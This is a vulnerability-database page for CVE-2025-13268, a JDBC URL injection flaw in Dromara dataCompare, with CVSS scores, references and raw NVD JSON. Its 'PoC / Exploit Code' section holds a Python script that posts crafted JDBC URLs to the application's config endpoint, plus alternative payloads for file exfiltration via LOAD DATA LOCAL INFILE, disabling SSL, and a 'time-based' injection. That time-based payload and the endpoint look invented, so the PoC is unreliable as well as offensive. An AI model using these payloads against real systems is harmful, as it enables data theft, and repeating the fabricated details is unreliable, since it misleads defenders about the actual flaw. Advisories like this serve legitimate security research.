CVE-2025-13268

Description

A flaw has been found in Dromara dataCompare up to 1.0.1. The affected element is the function DbConfig of the file src/main/java/com/vince/xq/project/system/dbconfig/service/DbconfigServiceImpl.java of the component JDBC URL Handler. Executing manipulation can lead to injection. The attack can be launched remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dromara dataCompare <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13268 PoC - JDBC URL Injection in Dromara dataCompare
# Target: Dromara dataCompare <= 1.0.1
# Component: DbConfig function in DbconfigServiceImpl.java (JDBC URL Handler)

import requests
import json

# Malicious JDBC URL with injection payload
malicious_jdbc_url = "jdbc:mysql://target-server:3306/victim_db?useSSL=false&allowPublicKeyRetrieval=true&serverTimezone=UTC"

# Alternative payloads for different attack scenarios:
# 1. Data exfiltration via LOAD DATA LOCAL INFILE
payload_load_data = "jdbc:mysql://target:3306/db?allowLoadLocalInfile=true"

# 2. Disable security controls
payload_disable_ssl = "jdbc:mysql://target:3306/db?useSSL=false&allowPublicKeyRetrieval=true"

# 3. Time-based blind SQL injection
payload_time_based = "jdbc:mysql://target:3306/db?sessionVariables=waiter_delay(5000)--"

def exploit_cve_2025_13268(target_url, malicious_url):
    """
    Exploit JDBC URL injection vulnerability in DbConfig component
    """
    endpoint = f"{target_url}/api/dbconfig/set"
    
    # Payload structure for DbConfig injection
    payload = {
        "configName": "malicious_jdbc",
        "jdbcUrl": malicious_url,
        "username": "attacker",
        "password": "attacker_pwd"
    }
    
    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Injection payload sent successfully")
            print(f"[+] Payload: {malicious_url}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

# Usage example
if __name__ == "__main__":
    target = "http://vulnerable-server:8080"
    exploit_cve_2025_13268(target, malicious_jdbc_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13268
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13268
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13268/
[4] VulDB https://vuldb.com/cve/CVE-2025-13268
[5] https://github.com/dromara/dataCompare/issues/13
[6] https://vuldb.com/?ctiid.332603
[7] https://vuldb.com/?id.332603
[8] https://vuldb.com/?submit.689460

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13268", "sourceIdentifier": "[email protected]", "published": "2025-11-17T08:16:24.013", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Dromara dataCompare up to 1.0.1. The affected element is the function DbConfig of the file src/main/java/com/vince/xq/project/system/dbconfig/service/DbconfigServiceImpl.java of the component JDBC URL Handler. Executing manipulation can lead to injection. The attack can be launched remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-707"}]}], "references": [{"url": "https://github.com/dromara/dataCompare/issues/13", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332603", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332603", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.689460", "source": "[email protected]"}]}}